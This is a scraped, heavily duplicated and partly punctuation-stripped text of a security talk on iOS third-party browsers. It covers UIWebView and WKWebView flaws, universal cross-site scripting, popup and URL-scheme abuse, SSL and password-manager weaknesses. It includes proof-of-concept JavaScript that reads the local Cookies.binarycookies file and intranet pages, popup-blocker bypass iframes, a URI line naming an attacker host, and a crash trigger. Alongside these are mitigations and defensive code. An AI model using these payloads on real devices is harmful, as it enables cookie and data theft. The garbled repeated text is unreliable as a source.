bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
Mobile Browsers Security iOS
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
Mobile Browsers Security iOS
References
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
Mobile Browsers Security iOS
References
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
Mobile Browsers Security iOS
References
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Mobile Browsers Security iOS
Questions?
Mobile Browsers Security iOS
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Mobile Browsers Security iOS
![Page 57: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/57.jpg)
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation');
UXSS Universal Cross-Site Scripting
![Page 58: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/58.jpg)
Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other + filename .html
UXSS Universal Cross-Site Scripting
![Page 59: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/59.jpg)
JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
path = path + '/Library/Cookies/Cookies.binarycookies';
x = new XMLHttpRequest();
x.open('GET', path, false);
x.send();
alert(x.responseText);
</script>
UXSS Universal Cross-Site Scripting
![Page 60: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/60.jpg)
JS without Same-Origin-Policy
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://your.intranet/', false);
x.send();
alert(x.responseText);
</script>
UXSS Universal Cross-Site Scripting
![Page 61: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/61.jpg)
Challenge: Hijack password autofill
UXSS Universal Cross-Site Scripting
![Page 62: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/62.jpg)
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header: HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
UXSS Universal Cross-Site Scripting
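Three of the mitigations above in Objective-C, as an added example (not code from the slides or from any of the tested browsers): a UIWebView that shows a downloaded .html file as text/plain under about:blank, and an iOS 8 WKWebView with JavaScript disabled; the two function names are assumptions.

```objc
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Added example, not from the slides. What is being avoided: loading a downloaded
// file with loadRequest: gives it a file:// origin, where the script shown earlier
// in the deck can read the app container over XMLHttpRequest.

// UIWebView: hand the bytes over as text/plain, so markup is displayed rather than
// parsed, and give the document about:blank instead of a file:// base URL.
UIWebView *ViewerForDownloadedHTML(NSURL *fileURL, CGRect frame) {
    UIWebView *webView = [[UIWebView alloc] initWithFrame:frame];
    NSData *bytes = [NSData dataWithContentsOfURL:fileURL];
    if (!bytes) bytes = [NSData data];      // missing file: show an empty document
    [webView loadData:bytes
             MIMEType:@"text/plain"
     textEncodingName:@"utf-8"
              baseURL:[NSURL URLWithString:@"about:blank"]];
    return webView;
}

// WKWebView (iOS 8+): render the markup, but with JavaScript disabled in the
// configuration of this one view, and again under about:blank rather than file://.
// (The CSP "sandbox" directive from the slide is the equivalent control when the
// same content is served by a web server rather than loaded from disk.)
WKWebView *ScriptlessViewerForDownloadedHTML(NSURL *fileURL, CGRect frame) {
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    WKWebView *webView = [[WKWebView alloc] initWithFrame:frame configuration:config];
    NSString *html = [NSString stringWithContentsOfURL:fileURL
                                              encoding:NSUTF8StringEncoding
                                                 error:NULL];
    [webView loadHTMLString:(html ?: @"") baseURL:[NSURL URLWithString:@"about:blank"]];
    return webView;
}
```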
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
• JavaScript with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
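The two weaknesses the slide lists, saving a password under a domain the page did not legitimately own and filling it back on a matching host over the wrong scheme, both come from keying credentials to a domain string rather than to a full origin. The following is an added example written for this page, not code from the slides or from any tested browser; it shows a deliberately strict fill/save policy for the JavaScript side of a WebView browser's password manager. The `frame` and `submission` object shapes, and the function names, are assumptions.

```javascript
// Added example (assumed object shapes and names), not code from the slides or any tested browser.

// Resolve href against base and return its origin (scheme + host + port),
// or null if it does not parse. Comparing whole origins is what keeps
// https://bank.example and http://bank.example apart as separate keys.
function resolveOrigin(href, base) {
  try {
    return new URL(href, base).origin;
  } catch (e) {
    return null;
  }
}

// saved: { origin } as stored at save time.  frame: { isTopFrame, documentUrl }
function shouldFillCredential(saved, frame) {
  // Only the top frame receives credentials: the slide notes that the
  // feature JS runs with top-frame privileges and cannot see into
  // cross-origin subframes, and a login form inside a third-party iframe
  // must never receive the top site's password anyway.
  if (!frame.isTopFrame) return { fill: false, reason: "subframe" };
  const pageOrigin = resolveOrigin(frame.documentUrl);
  if (pageOrigin === null) return { fill: false, reason: "unparseable" };
  // Refuse plaintext http even when the host matches the saved entry.
  if (!pageOrigin.startsWith("https://")) return { fill: false, reason: "insecure" };
  if (pageOrigin !== saved.origin) return { fill: false, reason: "origin-mismatch" };
  return { fill: true, reason: "ok" };
}

// submission: { userGesture, formAction }  frame: { isTopFrame, documentUrl }
function shouldSaveCredential(submission, frame) {
  // Save only after a real, user-initiated submit in the top frame, and key
  // the entry to the document origin, never to a domain chosen by page script.
  if (!frame.isTopFrame) return { save: false, reason: "subframe" };
  if (!submission.userGesture) return { save: false, reason: "no-user-gesture" };
  const pageOrigin = resolveOrigin(frame.documentUrl);
  const actionOrigin = resolveOrigin(submission.formAction, frame.documentUrl);
  if (pageOrigin === null || actionOrigin === null) {
    return { save: false, reason: "unparseable" };
  }
  if (!pageOrigin.startsWith("https://") || !actionOrigin.startsWith("https://")) {
    return { save: false, reason: "insecure" };
  }
  // A form posting to another origin must not create an entry for this page.
  if (pageOrigin !== actionOrigin) return { save: false, reason: "cross-origin-action" };
  return { save: true, reason: "ok", origin: pageOrigin };
}
```

Real password managers relax some of these rules (cross-origin form actions are common on federated logins), but each relaxation reopens one of the two slide bullets, so it should be an explicit, documented decision rather than the default.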
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most third-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter: @runicpl @h0wlu
Thank you
![Page 63: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/63.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 64: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/64.jpg)
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 65: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/65.jpg)
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 66: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/66.jpg)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
